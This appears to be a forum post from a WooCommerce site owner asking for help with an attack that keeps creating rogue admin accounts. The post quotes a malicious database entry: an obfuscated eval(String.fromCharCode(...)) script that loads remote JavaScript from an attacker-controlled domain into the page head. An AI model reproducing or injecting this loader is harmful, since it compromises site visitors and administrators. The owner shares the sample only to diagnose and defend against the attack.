Admin User creating attack

I am facing new admin user creation attack on one of my woocommerce site. The admin user are created with systemusers username and using [email protected] as email address. After creating the user admin and user are getting new user created email notifications. Anyone here face this same problem before??how I can protect my site from this attack???

When first time user created I found one vulnerable plugin on my site from wordfence scan I have deleted that plugin now and installed iTheme security pro version and enabled 2FA for admin users but after that still 5 times that user is creating on my site.

When i checking DB i have found following code in wp_postmeta table

{“settings”:{“wps_settings_general_products_url”:”””eval(String.fromCharCode(32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,52,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59))>”

On this following document wordfence saying this type of attack will protected but its not protected why its not protecting and how this attack come??
https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/